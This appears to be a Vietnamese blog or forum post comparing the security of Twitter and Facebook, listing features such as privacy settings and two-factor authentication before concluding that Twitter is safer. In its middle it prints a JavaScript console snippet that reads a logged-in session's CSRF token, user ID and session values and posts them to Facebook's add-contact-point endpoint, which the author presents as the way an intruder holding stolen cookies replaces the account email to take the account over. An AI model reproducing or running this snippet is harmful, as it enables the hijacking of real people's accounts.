Bảo mật của Twitter và Facebook phụ thuộc vào nhiều yếu tố, và có thể khó để xác định rõ ràng rằng một trong hai dịch vụ nào tốt hơn trong mọi tình huống. Dưới đây là một số khía cạnh cơ bản về bảo mật cho cả hai:

  1. Quyền riêng tư: Cả Twitter và Facebook đều cung cấp cài đặt riêng tư cho người dùng. Bạn có thể điều chỉnh ai có thể xem thông tin cá nhân của bạn trên cả hai nền tảng. Tuy nhiên, việc kiểm soát và bảo vệ thông tin riêng tư của bạn phụ thuộc vào cách bạn cấu hình các cài đặt này và cách bạn quản lý tài khoản của mình.
  2. Xác thực hai yếu tố (2FA): Cả Twitter và Facebook đều hỗ trợ tính năng xác thực hai yếu tố, giúp tăng cường bảo mật tài khoản của bạn.
  3. Bảo mật mật khẩu: Cả hai dịch vụ đều khuyến nghị sử dụng mật khẩu mạnh và thường xuyên thay đổi mật khẩu để bảo vệ tài khoản.
  4. Bảo mật dữ liệu: Cả hai công ty đều thực hiện các biện pháp bảo mật để bảo vệ dữ liệu của người dùng khỏi việc truy cập trái phép. Tuy nhiên, Facebook đã gặp nhiều vụ vi phạm bảo mật nghiêm trọng trong quá khứ.
  5. Bảo vệ khỏi thư rác và lừa đảo: Cả hai dịch vụ đều cung cấp các công cụ để phát hiện và ngăn chặn thư rác và lừa đảo trên nền tảng của họ.

Trên đó là những điểm cộng của cả 2 bên, tuy nhiên với 10 năm kinh nghiệm làm bên nền tảng Facebook thì mình thấy nó khá nhiều lỗ hổng cũng như là lỏng lẻo trong việc bảo vệ thông tin người dùng

var spinR = require([“SiteData”]).__spin_r;
var spinB = require([“SiteData”]).__spin_b;
var spinT = require([“SiteData”]).__spin_t;
var jazoest = require([“SprinkleConfig”]).jazoest;
var fbdtsg = require([“DTSGInitData”]).token;
var userId = require([“CurrentUserInitialData”]).USER_ID;
var hsi = require([“SiteData”]).hsi;
var email = “”;
var url = “https://www.facebook.com/add_contactpoint/dialog/submit/”;
var data = “jazoest=22134&fb_dtsg=” + fbdtsg + “&next=&contactpoint=” + email + “&__user=” + userId + “&__a=1&__dyn=&__req=1&__be=1&__pc=PHASED%3ADEFAULT&dpr=1&__rev=&__s=&__hsi=” + hsi + “&__spin_r=” + spinR + “&__spin_b=” + spinB + “&__spin_t=” + spinT;
fetch(url, {
method: ‘POST’,
body: data,
headers: {
‘Content-Type’: ‘application/x-www-form-urlencoded’
}
}).then(e => e.text()).then(e => {})

Mình ví dụ khi hacked xâm nhập được vào nick Facebook thông qua Cookies thì ngay lập tức nó có thể đá mail cũ thay mail mới bằng cách bật F12 và chèn code để chạy tác động vào hệ thống của facebook để chiếm đoạt tài khoản. Ngược lại đối với Twitter thì dù bạn có biết Pass bạn truy cập vẫn bị xác minh và muốn thay đổi thông tin phải mất 48h để làm việc đó .

Tổng kết : Mình đánh giá Twitter bảo mật cao hơn Facebook